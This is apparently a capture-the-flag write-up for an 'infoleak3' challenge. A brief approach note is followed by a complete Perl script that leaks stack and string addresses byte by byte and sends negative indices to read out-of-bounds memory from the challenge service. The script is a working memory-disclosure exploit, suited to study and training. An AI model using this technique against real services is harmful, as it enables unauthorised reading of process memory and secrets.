Rating:
Task:
Baby's third infoleak even a tiny mit more even than hard to have. (https://en.wikipedia.org/wiki/Information_leakage)
Server: 172.31.1.38:1614
Binary: 172.31.0.10/tyro_infoleak3_b2d435964aac6bc1098ce62d35cba9af
Approach:
This challenge was identical to infoleak2, with the added restriction that only 1 byte could be read per request and only 16 requests in total could be sent in one session. The script used for infoleak2 was modified to meet these constraints.
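#!/usr/bin/perl
# Write-up script for the "infoleak3" exercise described above.
#
# The service returns one byte per request and, per the write-up, allows at
# most 16 requests per session.  Each pass below therefore opens a fresh
# connection and spends 12 requests on it: 4 bytes for the value the script
# labels "Stack", 4 bytes for the value it labels "String", and 4 bytes of the
# target data at the current chunk offset.
use strict;
use warnings;
use IO::Socket::INET;

# Challenge service address, as given in the task description.
my $HOST = '172.31.1.38';
my $PORT = 1614;

# Extract every "0xN" / "0xNN" token from a server reply and return the
# numeric byte values in the order they appeared.
sub _reply_bytes {
    my ($reply) = @_;
    my @tokens = ( $reply =~ /0x(\S\S?)/sg );
    return map { hex($_) } @tokens;
}

# Render a list of byte values as one contiguous two-digits-per-byte hex string.
sub _hex_string {
    my (@bytes) = @_;
    return join '', map( sprintf( '%02x', $_ ), @bytes );
}

# Send one batch of newline-separated requests, give the service half a
# second to answer, and return whatever arrived (up to 4096 bytes).
sub _exchange {
    my ( $sock, $request ) = @_;
    $sock->send($request);
    select( undef, undef, undef, 0.5 );
    my $reply = '';
    defined $sock->recv( $reply, 4096 )
        or die "recv from $HOST:$PORT failed: $!\n";
    return $reply;
}

my $decoded = '';

# The target data is fetched in 4-byte chunks: 11 chunks, 44 bytes in total.
for my $byte_offset ( 0, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40 ) {

    # New session per chunk so the 16-request budget is never exceeded.
    my $sock = IO::Socket::INET->new(
        PeerAddr => $HOST,
        PeerPort => $PORT,
        Proto    => 'tcp',
    ) or die "Cannot connect to $HOST:$PORT: $@\n";
    sleep(1);    # let the service print its banner before we talk to it

    # Indices 3..0 are requested highest-first, so the concatenated hex string
    # has the byte from index 3 as its most significant byte.
    # NOTE(review): presumably this reassembles a little-endian 32-bit value;
    # confirm against the binary.
    my $stack = _hex_string( _reply_bytes( _exchange( $sock, "3\n2\n1\n0\n" ) ) );
    printf "Stack is: %08x\n", hex($stack);

    # Same reassembly for indices 0xb..0x8.
    my $string = _hex_string( _reply_bytes( _exchange( $sock, "b\na\n9\n8\n" ) ) );
    printf "String is: %08x\n", hex($string);

    # Distance between the two leaked values; the requested indices below are
    # derived from it and sent with a leading minus sign.
    # NOTE(review): the service evidently accepts these negative indices, which
    # suggests the read offset has no lower-bound check - verify in the binary.
    my $offset = hex($stack) - hex($string);

    my $send = '';
    for my $local_offset ( 0 .. 3 ) {
        my $val = sprintf( '%08x', $offset - $byte_offset - $local_offset );
        $send .= "-$val\n";
    }

    # Append the four returned bytes, as characters, to the running result.
    $decoded .= join '', map { chr($_) } _reply_bytes( _exchange( $sock, $send ) );
    print "Current: $decoded\n";

    $sock->close;
}

print "Decoded as: $decoded\n";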